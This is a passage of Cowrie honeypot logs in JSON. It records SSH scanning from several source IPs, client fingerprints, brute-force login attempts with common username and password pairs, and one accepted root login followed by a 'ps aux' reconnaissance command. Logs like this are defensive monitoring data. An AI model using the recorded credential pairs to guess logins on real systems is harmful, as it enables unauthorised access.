03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:17:23.916615Z","src_ip":"212.227.125.160","session":"9fbf7af57e47"}
{"eventid":"cowrie.session.closed","duration":"73.4","message":"Connection lost after 73.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:17:24.960524Z","src_ip":"212.227.125.160","session":"8a50819265c5"}
{"eventid":"cowrie.login.failed","username":"infocare","password":"abc.123","message":"login attempt [infocare/abc.123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:17:24.988823Z","src_ip":"212.227.125.160","session":"9fbf7af57e47"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:17:26.278853Z","src_ip":"212.227.125.160","session":"9fbf7af57e47"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":50474,"dst_ip":"1.2.3.4","dst_port":22,"session":"95b84c2f96d3","protocol":"ssh","message":"New connection: 201.148.180.50:50474 (1.2.3.4:22) [session: 95b84c2f96d3]","sensor":"my-vps","timestamp":"2025-08-31T03:17:27.954617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:17:29.017461Z","src_ip":"201.148.180.50","session":"95b84c2f96d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:17:29.018171Z","src_ip":"201.148.180.50","session":"95b84c2f96d3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:17:30.061622Z","src_ip":"212.227.125.160","session":"58ab95574dc1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:17:30.062606Z","src_ip":"212.227.125.160","session":"58ab95574dc1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55946,"dst_ip":"1.2.3.4","dst_port":22,"session":"04286d698506","protocol":"ssh","message":"New connection: 212.227.125.160:55946 (1.2.3.4:22) [session: 04286d698506]","sensor":"my-vps","timestamp":"2025-08-31T03:17:33.819413Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":59668,"dst_ip":"1.2.3.4","dst_port":22,"session":"5141b7d7b190","protocol":"ssh","message":"New connection: 41.226.27.251:59668 (1.2.3.4:22) [session: 5141b7d7b190]","sensor":"my-vps","timestamp":"2025-08-31T03:17:33.979869Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:17:33.980730Z","src_ip":"41.226.27.251","session":"5141b7d7b190"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:17:34.029568Z","src_ip":"41.226.27.251","session":"5141b7d7b190"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-31T03:17:34.175795Z","src_ip":"41.226.27.251","session":"5141b7d7b190"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:17:34.230848Z","src_ip":"212.227.125.160","session":"04286d698506"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:17:34.231578Z","src_ip":"212.227.125.160","session":"04286d698506"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:17:35.476506Z","src_ip":"41.226.27.251","session":"5141b7d7b190"}
{"eventid":"cowrie.login.success","username":"root","password":"Cadu147963","message":"login attempt [root/Cadu147963] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:17:35.628599Z","src_ip":"201.148.180.50","session":"95b84c2f96d3"}
{"eventid":"cowrie.login.failed","username":"git","password":"root123","message":"login attempt [git/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:17:36.127388Z","src_ip":"212.227.125.160","session":"04286d698506"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:17:37.672484Z","src_ip":"212.227.125.160","session":"04286d698506"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:17:38.845511Z","src_ip":"201.148.180.50","session":"95b84c2f96d3"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T03:17:38.846209Z","src_ip":"201.148.180.50","session":"95b84c2f96d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:17:40.065228Z","src_ip":"201.148.180.50","session":"95b84c2f96d3"}
{"eventid":"cowrie.session.closed","duration":"12.1","message":"Connection lost after 12.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:17:40.066238Z","src_ip":"201.148.180.50","session":"95b84c2f96d3"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:17:48.506156Z","src_ip":"212.227.125.160","session":"58ab95574dc1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36008,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2cad985507f","protocol":"ssh","message":"New connection: 212.227.235.229:36008 (1.2.3.4:22) [session: b2cad985507f]","sensor":"my-vps","timestamp":"2025-08-31T03:17:52.621498Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":33288,"dst_ip":"1.2.3.4","dst_port":22,"session":"10a3179f4de5","protocol":"ssh","message":"New connection: 41.226.27.251:33288 (1.2.3.4:22) [session: 10a3179f4de5]","sensor":"my-vps","timestamp":"2025-08-31T03:17:54.109491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:17:54.154781Z","src_ip":"41.226.27.251","session":"10a3179f4de5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:17:54.155630Z","src_ip":"41.226.27.251","session":"10a3179f4de5"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-31T03:17:54.349088Z","src_ip":"41.226.27.251","session":"10a3179f4de5"}
{"eventid":"cowrie.session.closed","duration":"33.1","message":"Connection lost after 33.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:17:54.700306Z","src_ip":"212.227.125.160","session":"58ab95574dc1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:17:55.613441Z","src_ip":"41.226.27.251","session":"10a3179f4de5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:17:56.556725Z","src_ip":"212.227.235.229","session":"b2cad985507f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:17:56.557734Z","src_ip":"212.227.235.229","session":"b2cad985507f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45930,"dst_ip":"1.2.3.4","dst_port":22,"session":"05ee3d25a926","protocol":"ssh","message":"New connection: 212.227.235.229:45930 (1.2.3.4:22) [session: 05ee3d25a926]","sensor":"my-vps","timestamp":"2025-08-31T03:18:10.574996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:18:11.265438Z","src_ip":"212.227.235.229","session":"05ee3d25a926"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:18:11.266124Z","src_ip":"212.227.235.229","session":"05ee3d25a926"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":58236,"dst_ip":"1.2.3.4","dst_port":22,"session":"89ba90223694","protocol":"ssh","message":"New connection: 41.226.27.251:58236 (1.2.3.4:22) [session: 89ba90223694]","sensor":"my-vps","timestamp":"2025-08-31T03:18:14.448991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:18:14.449889Z","src_ip":"41.226.27.251","session":"89ba90223694"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:18:14.493685Z","src_ip":"41.226.27.251","session":"89ba90223694"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:18:14.626715Z","src_ip":"41.226.27.251","session":"89ba90223694"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:18:15.834391Z","src_ip":"41.226.27.251","session":"89ba90223694"}
{"eventid":"cowrie.login.failed","username":"git","password":"P@ssw0rd123","message":"login attempt [git/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:18:17.194831Z","src_ip":"212.227.235.229","session":"05ee3d25a926"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:18:19.012395Z","src_ip":"212.227.235.229","session":"05ee3d25a926"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51262,"dst_ip":"1.2.3.4","dst_port":22,"session":"57ca1ad02829","protocol":"ssh","message":"New connection: 212.227.125.160:51262 (1.2.3.4:22) [session: 57ca1ad02829]","sensor":"my-vps","timestamp":"2025-08-31T03:18:27.269814Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36162,"dst_ip":"1.2.3.4","dst_port":22,"session":"e697d5c1b480","protocol":"ssh","message":"New connection: 212.227.125.160:36162 (1.2.3.4:22) [session: e697d5c1b480]","sensor":"my-vps","timestamp":"2025-08-31T03:18:31.479350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:18:31.871773Z","src_ip":"212.227.125.160","session":"e697d5c1b480"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:18:31.872437Z","src_ip":"212.227.125.160","session":"e697d5c1b480"}
{"eventid":"cowrie.login.failed","username":"git","password":"P@ssw0rd123","message":"login attempt [git/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:18:34.209433Z","src_ip":"212.227.125.160","session":"e697d5c1b480"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":39628,"dst_ip":"1.2.3.4","dst_port":22,"session":"2703f41f20ef","protocol":"ssh","message":"New connection: 41.226.27.251:39628 (1.2.3.4:22) [session: 2703f41f20ef]","sensor":"my-vps","timestamp":"2025-08-31T03:18:34.773382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:18:34.799982Z","src_ip":"41.226.27.251","session":"2703f41f20ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-